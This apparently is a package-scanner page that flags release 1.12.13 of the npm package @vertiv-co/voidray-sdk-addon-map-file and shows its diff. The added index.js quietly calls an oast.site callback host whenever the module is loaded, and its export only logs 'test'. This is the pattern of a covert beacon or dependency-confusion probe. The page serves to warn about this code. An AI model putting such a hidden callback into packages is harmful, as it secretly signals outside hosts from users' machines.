@vertiv-co/voidray-sdk-addon-map-file 1.12.13
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of @vertiv-co/voidray-sdk-addon-map-file might be problematic. Click here for more details.
- package/index.js +16 -0
- package/package.json +11 -0
package/index.js
ADDED
@@ -0,0 +1,16 @@
|
|
1
|
+
const axios = require('axios');
|
2
|
+
|
3
|
+
async function sendRequest() {
|
4
|
+
try {
|
5
|
+
const response = await axios.get('https://cqg77kled631sm393c0gxr9tggs83149n.oast.site/');
|
6
|
+
} catch (error) {
|
7
|
+
console.error('Error sending request:', error);
|
8
|
+
}
|
9
|
+
}
|
10
|
+
|
11
|
+
// Call the function
|
12
|
+
sendRequest();
|
13
|
+
|
14
|
+
module.exports = function() {
|
15
|
+
console.log("test");
|
16
|
+
};
|